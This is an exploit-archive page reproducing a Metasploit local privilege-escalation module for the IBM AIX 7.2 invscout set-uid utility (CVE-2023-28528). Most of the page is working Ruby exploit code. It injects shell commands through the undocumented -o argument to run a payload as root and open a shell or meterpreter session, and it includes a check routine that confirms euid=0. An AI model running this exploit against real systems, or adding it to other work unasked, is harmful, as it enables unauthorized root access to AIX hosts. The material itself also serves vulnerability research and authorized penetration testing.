IBM AIX 7.2 inscout Privilege Escalation

2023.05.20
Credit: Tim Brown
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'invscout RPM Privilege Escalation', 'Description' => %q{ This module exploits a command injection vulnerability in IBM AIX invscout set-uid root utility present in AIX 7.2 and earlier. The undocumented -rpm argument can be used to install an RPM file; and the undocumented -o argument passes arguments to the rpm utility without validation, leading to command injection with effective-uid root privileges. This module has been tested successfully on AIX 7.2. }, 'Author' => [ 'Tim Brown', # Discovery and PoC 'bcoles' # Metasploit ], 'References' => [ ['CVE', '2023-28528'], ['URL', 'https://talosintelligence.com/vulnerability_reports/TALOS-2023-1691'], ], 'Platform' => %w[unix aix], 'Arch' => ARCH_CMD, 'Payload' => { 'BadChars' => "\x00\x0a\x0d\x22", 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic telnet openssl' } }, 'DefaultOptions' => { 'PrependSetresuid' => true, 'PrependSetresgid' => true, 'PrependFork' => true }, 'SessionTypes' => %w[shell meterpreter], 'Targets' => [['Automatic', {}]], 'DefaultTarget' => 0, 'DisclosureDate' => '2023-04-24', 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options([ OptString.new('INVSCOUT_PATH', [true, 'Path to invscout executable', '/usr/sbin/invscout']) ]) end def invscout_path datastore['INVSCOUT_PATH'] end def check return CheckCode::Safe("#{invscout_path} is not executable") unless executable?(invscout_path) res = execute_command('id') id = res.to_s.scan(/^(.*?uid=.*?)$/).flatten.first.to_s return CheckCode::Safe("#{invscout_path} is not vulnerable.") unless id.include?('euid=0') CheckCode::Vulnerable("Output: #{id}") end def execute_command(cmd, _opts = {}) rpm_path = "#{Rex::Text.rand_text_alphanumeric(8..12)}.rpm" rpm_args = "; #{cmd}; echo " res = cmd_exec("#{invscout_path} -RPM #{rpm_path} -o \"#{rpm_args}\"") vprint_line(res) unless res.blank? res end def exploit execute_command(payload.encoded) end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top